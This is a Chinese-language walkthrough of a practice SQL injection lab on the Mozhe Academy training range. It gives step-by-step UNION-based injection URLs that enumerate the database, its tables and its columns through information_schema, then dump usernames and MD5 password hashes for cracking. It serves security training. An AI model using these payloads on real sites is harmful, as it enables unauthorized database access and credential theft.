靶场地址 在线靶场_墨者学院 (mozhe.cn)
启动靶场 观察是否存在入住点 点击进入登陆下面可能存在注入的页面地址
进入后获得以下页面 发现 ?id=1
运用sql语句 在?id=1后面添加and 1=1 页面正常 and 1=2 页面返回错误 可能存在注入点
运用 order by x 猜列名字段数量 看里面有多少个
从order by 1 猜测到 order by 5时页面错误 输入order by 4时页面正常 从此可以判定该表列数为4
获得到表的列数后 运用 union 语句进行猜解 让页面报错 显示出数字
可以在id=1 后面添加 and 1=2 或者id=1添加一个负号
http://124.70.22.208:48188/new_list.php?id=-1 union select 1,2,3,4
http://124.70.22.208:48188/new_list.php?id=1 and 1=2 union select 1,2,3,4
经以上操作报出数字2 3 这时候就可以在 2和3的位置进行相关的数据查询
查询数据库名字 数据库版本 将database()和version()带入 2,3中
http://124.70.22.208:48188/new_list.php?id=-1 union select 1,database(),version(),4
获得数据库名字为:mozhe_Discuz_StormGroup
数据库版本:5.7.22-0ubuntu0.16.04.1
数据库版本为5.7.22-0ubuntu0.16.04.1 在该版本的数据库中mysql存在一个自带的数据库名为information_schema里面含有数据库名 表名 列名 可以用 information_schema进行有据查询
从而可以通过查询它获得名为 mozhe_Discuz_StormGroup数据库中的表名 列名信息
mysql5.0以下:不存在information_schema数据库
mysql5.0以上:存在information_schema数据库
查询mozhe_Discuz_StormGroup下的所有表名信息 获得StormGroup_member 和 通知
http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
查到表名为:StormGroup_member
进行查询StormGroup_member 表名下面的列名信息
http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
查询StormGroup_member中的 用户名 密码
http://124.70.22.208:48188/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member
用户名:mozhe
如果有多个密码就在后面加上 limit 0,1 显示第一个 limit 1,1 显示第二个
找到一个可以白票的网站进行md5解密 获得密码 最后输入密码登陆即可